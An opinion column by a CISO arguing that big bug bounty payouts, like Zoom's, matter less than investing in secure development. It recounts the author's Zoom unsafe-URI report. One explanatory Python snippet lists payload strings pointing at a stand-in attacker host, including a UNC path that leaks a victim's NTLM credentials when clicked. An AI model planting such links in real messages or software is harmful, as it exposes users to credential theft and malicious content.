Lofty bug bounties catch attention, but they don't fix the underlying application security flaws they're meant to solve.

Alex Haynes, Chief Information Security Officer, IBS Software

February 4, 2021

4 Min Read

Zoom recently increased its maximum payout for vulnerabilities to $50,000 as part of its crowdsourced security program. Such a lofty figure makes great headlines, attracts new talent in search of the big bucks, and raises the question — how much is a vulnerability worth?

I found several bugs in Zoom's products a few years back, when its crowdsourced security program was a fledgling enterprise. Three of them had already been found by others before me — what we call a "duplicate" in crowdsourced security — meaning you get no reward for your time or effort even though it's a valid bug.

The fourth vulnerability was quite interesting, and it reappeared at the start of the pandemic when Zoom was seeing increased usage (and increased scrutiny). I labeled the vulnerability "Potentially unsafe URIs can cause local file inclusion, command injection, or remote connection," which is exactly what it did. To summarize, you could send Uniform Resource Identifiers that would appear as links to someone you were chatting with, and these could do various things like open malicious websites, download files, or even run commands on the user's system. (Bizarrely, it even worked with the gopher:// protocol.) The variant that resurfaced at the beginning of 2020 worked the same way but focused on Universal Naming Convention (UNC) paths, so that a victim's NT LAN Manager (NTLM) credentials could be sent to an attacker's domain.
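As a rough sketch of the classes of payload involved (the hostnames and strings below are hypothetical illustrations, not taken from the original report and not specific to Zoom's implementation), the issue boils down to a chat client rendering raw strings as clickable links:

```python
# Hypothetical payload strings illustrating the URI classes described above.
# Hostnames are placeholders; nothing here reproduces the original report.
payloads = [
    "https://attacker.example/landing",        # opens an attacker-controlled site
    "file:///C:/Windows/System32/calc.exe",    # local-file-style link
    "gopher://attacker.example:70/1",          # legacy protocol, still rendered as a link
    r"\\attacker.example\share\report.docx",   # UNC path: Windows attempts SMB/NTLM auth
]

# On a vulnerable client, each string becomes a clickable link in chat;
# clicking the UNC path sends the victim's NTLM credentials to the attacker's host.
for uri in payloads:
    print(f"Rendered as a clickable link: {uri}")
```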

For reporting this vulnerability, I was (eventually) paid the "princely" sum of $50, and it took about six months for the report to work its way up to the powers that be. Two years later, I received a message saying it had been fixed, and could I spend my free time checking the fix? (I didn't.) Today, far more lavish payouts are common in crowdsourced security — and they distract from the real question: Should we really be paying out $50,000 for a single vulnerability?

How Lavish Rewards Harm People and Products
These kinds of sums are not new, of course. At the height of the pandemic, Zoom zero-days for the Windows app reportedly were selling for $500,000, and companies like Zerodium frequently traffic in these kinds of vulnerabilities in the "grey market" for vulnerability transactions.

Back to the question at hand: there are many downsides to ever-increasing payouts in crowdsourced security programs. While the main aim is to increase interest in the program (remember, crowdsourced programs rely on an Orwellian gig economy, where you work for free unless you find a valid bug), these payouts also have the counterproductive effect of cannibalizing talent away from legitimate security work, salaried or otherwise.

There is also the cost of fixing vulnerabilities once they are live. That $50,000 could instead be spent fixing the root causes of vulnerabilities and "shifting left," where it would pay for far more than a single fix. Some obvious examples of how that money could be used:

  • A full-time application security engineer

  • From 10 to 20 pen tests or code reviews (depending on the day rate)

  • A full suite of automated pen-testing software

  • Full deployment and implementation of static application security testing (SAST) software (code scanning/dependencies) across upwards of 10 million lines of code

  • Training hundreds of developers in secure coding techniques

Any of the above would spot the issues raised in crowdsourced programs long before they ever made it to a live environment — and at far lower cost. The argument for big rewards is that the payout offsets the monetary impact of an eventual exploit; the counterargument is that a shift-left approach multiplies that offset by a factor of 10. If your SAST tooling, your application security engineers, or even your code reviews spot 10 of these vulnerabilities before they go live, you've also avoided the additional cost of refactoring code and pushing out a build for each individual fix.
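As a rough back-of-the-envelope comparison (the per-bug hotfix figure below is an entirely hypothetical assumption, used only to make the 10x argument concrete):

```python
# Hypothetical cost comparison; only the $50,000 figures come from the article.
bounty_per_bug = 50_000        # headline payout for one live vulnerability
hotfix_cost_per_bug = 5_000    # assumed cost to refactor and push a build per live bug
bugs = 10                      # the article's assumed shift-left yield
shift_left_budget = 50_000     # same spend on SAST, training, or an AppSec hire

reactive_cost = bugs * (bounty_per_bug + hotfix_cost_per_bug)
print(f"Paying bounties and hotfixing {bugs} live bugs: ${reactive_cost:,}")
print(f"Catching the same {bugs} bugs pre-release:      ${shift_left_budget:,}")
```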

Chase the Cause, Not the Symptom
Crowdsourced security scales a process that always chases the symptom, not the cause, and offering ever-increasing rewards won't fix the structural issue underneath: poor application security hygiene. The same could be said for the alphabet soup of acronyms in the cybersecurity technology space (think IAM, WAF, DAST, SIEM, etc.): many of these technologies are simply bandages over problems that a comprehensive application security pipeline would resolve.

Paying five-figure rewards for single vulnerabilities won't suddenly give you better security. When deciding how much to pay for a vulnerability, if you find yourself asking, "Is this too much for a vulnerability?" then the better question is, "Am I shifting left enough?"

About the Author(s)

Alex Haynes

Chief Information Security Officer, IBS Software

Alex Haynes is a former pen tester with a background in offensive security and is credited with discovering vulnerabilities in products by Microsoft, Adobe, Pinterest, Amazon Web Services, and IBM. He is a former top 10 ranked researcher on Bugcrowd and a member of the Synack Red Team. He is currently CISO at IBS Software. Alex has contributed to United States Cyber Security Magazine, Cyber Defense Magazine, Infosecurity Magazine, and the IAPP tech blog. He has also spoken at security conferences including OWASP and ISC Security Summits.
